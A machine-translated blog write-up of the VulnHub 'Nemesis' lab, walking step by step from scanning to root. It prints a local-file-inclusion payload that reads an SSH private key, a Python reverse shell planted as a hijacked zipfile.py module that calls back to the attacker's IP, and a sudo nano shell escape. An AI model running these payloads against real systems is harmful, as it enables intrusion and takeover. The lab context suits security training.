当前位置:网站首页>Penetration practice vulnhub range Nemesis

Penetration practice vulnhub range Nemesis

2022-07-01 17:40:00 It's safe to go to school on Fubo road

No.28 Nemesis

Target information

Download address :

https://www.vulnhub.com/entry/ia-nemesis-101,582/

shooting range : VulnHub.com

Target name : IA: Nemesis (1.0.1)

difficulty : secondary - difficult

Release time : 2020 year 10 month 25 Japan

Prompt information :

 This box is to improve Linux Privilege escalation and CMS Skills , I hope you like .

The goal is : 2 individual flag

Experimental environment 

 attack :VMware	kali	192.168.7.3

 Drone aircraft :Vbox		linux	IP Automatic access to

information gathering

Scan host

Scan the target in the LAN IP Address 

sudo nmap -sP 192.168.7.1/24

image-20220211223512844

The scanned host address is 192.168.7.166

Scan port

Scan the open service port of the target 

sudo nmap -sC -sV -p- 192.168.7.166 -oN Nemesis.nmap

image-20220211223635852

Scan to 3 Open ports , among 80(http)52845(http)、52846(SSH), First visit 80 port

Web penetration 

http://192.168.7.166

image-20220211224212274

There are some tips after opening the home page , Let's find the bug and fix it , First do a directory scan

Directory scanning 

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.7.166 -x php,html,txt,zip

image-20220211225431068

Scan to contact.php and robots.txt, hold robots.txt Download and see what it has 

wget http://192.168.7.166/robots.txt
cat robots.txt

image-20220211225616393

Tip let's find the real vulnerability , Look again. contact.php What is it? 

http://192.168.7.166/contact.php

image-20220211230808045

A normal page , Find some tips in the source code

image-20220211230921696

a section php Code , obtain 3 Parameter echo 1 individual , Let's try 

http://192.168.7.166/contact.php?name=a&email=b&message=ls
http://192.168.7.166/contact.php?name=a&email=b&message=../../../../etc/passwd

No information is echoed , Maybe the injection point is not here . stay login.html Find some information in the page source code 

http://192.168.7.166/login.html

image-20220211233216264

I think it's user name, password and so on. Write it down first , There is also a page thanoscarlos.html Visit

image-20220211233441625

No useful information , visit 52845 port 

http://192.168.7.166:52845

image-20220211233733366

After the visit is a html5 Make a website , stay Contact Us I found that some of the contents are the same as the previous php The tips on the page are very similar

image-20220211234054210

image-20220211234106895

The same is 3 Parameters , Let's try

image-20220211234213968

image-20220211234230745

Pop up and save to file after submission , Related to documents , Maybe the file contains , Try again.

The local file contains a vulnerability

image-20220211234415493

image-20220211234440088

After submission, it appears passwd The contents of the document , Take a look at the source code

image-20220212000807819

Two users have login permission , This one below thanos With the front login.html The same one is displayed on the page hacker_in_the_town Could it be a password ,SSH Log in and try ( There's a leak here 1 individual 

ssh [email protected] -p 52846

image-20220211235137798

It is logged in with public key , Try to read thanos Public key under user directory

payload

message=../../../../home/thanos/.ssh/id_rsa&submit=

image-20220211235711551

Successfully read the public key file , Save him , Try logging in again 

ssh [email protected] -p 52846 -i id_rsa

image-20220211235915203

Check what is in the user directory 

ls -al
cat flag1.txt

image-20220212000139946

Find a backup python Scripts and flag1.txt, And then look at backup.py The content of 

cat backup.py

image-20220212000421726

This script will /var/www/html Catalog backup to /tmp/website.zip

home There is another one in the catalog carlos User directory , Prompt that you have no permission when accessing , Find the right information

perform sudo -l Time confirmation hacker_in_the_town No thanos Password ,suid There's no authority , Upload a pspy64

kali Open an account on the attack plane http service 

python3 -m http.server

Download from the target pspy64

wget http://192.168.7.3:8000/pspy64

pspy64 Add execute permission and run 

chmod +x pspy64
./pspy64

image-20220212005413610

image-20220212005622736

You can see UID1000 Of users execute every minute backup.py Script

image-20220212010025951

This UID Namely carlos user , We can use this script to raise rights , Let's take a look at the script 

cat backup.py

image-20220212012126395

Here's a quote from zipfile, We can do it in backup.py File directory to create a zipfile.py file

kali Operation on attack

Listen first 4444 port 

nc -lvvp 4444

image-20220212014651788

To create a zipfile.py file 

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.7.3",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Turn on http service 

python3 -m http.server

image-20220212014720726

Download from the target zipfile.py file 

wget http://192.168.7.3:8000/zipfile.py

image-20220212014628563

Wait a moment, and the target will automatically execute backup.py Script

image-20220212014809934

Rebound success , Switch to interactive shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+z Shortcut key 
stty -a
stty raw -echo;fg
reset

image-20220212015023886

Switch complete , see carlos What is in the user directory 

ls -al

image-20220212015207926

see flag2.txt

cat flag2.txt

image-20220212015237636

Get the number 2 individual flag, Check it again root.txt

cat root.txt

image-20220212015308192

The prompt says carlos The user's password has been encrypted , The encrypted code is stored in encrypt.py In file , Let's crack the encrypted content , The format is 

************FUN********

Let's have a look at encrypt.py What is in the script 

cat encrypt.py

image-20220212015827374

Through the script, you can see that it is through affine encrypt Encrypted ,

FAJSRWOXLAXDQZAWNDDVLSU

We went to the dcode.fr Take a look , You should pay attention to using this website , Be sure to wait until all are loaded , Otherwise, the operation will fail 

https://www.dcode.fr/chiffre-affine

image-20220212024326120

On the left is the solution , We follow the rules given before image-20220212024456461 Compare the ENCRYPTIONISFUNPASSWORD

We use this password to execute sudo command 

sudo -l
 Input password ENCRYPTIONISFUNPASSWORD

image-20220212024951773

The password is correct , find sudo A power order nano

sudo /bin/nano /opt/priv
Ctrl + r
Ctrl + x
reset; sh 1>&0 2>&0

image-20220212031111437

image-20220212031207816

Ctrl + r

image-20220212031235748

Ctrl + x

image-20220212031309186

Input reset; sh 1>&0 2>&0

image-20220212031341679

There is no response on the screen after input , In fact, the right has been raised successfully , When the input id You can see 

id

image-20220212031509900

Looks a little uncomfortable , use python Switch to interactive shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
cd /root
ls

image-20220212031654677

cat root.txt

image-20220212031728495

Get root.txt, Game over . Friends who like shooting can search on wechat “ It's safe to go to school on vobo road ” official account 、 Or scan the QR code below to get more targeting articles .
Insert picture description here

原网站

版权声明
本文为[It's safe to go to school on Fubo road]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202152327514043.html

边栏推荐

猜你喜欢

随机推荐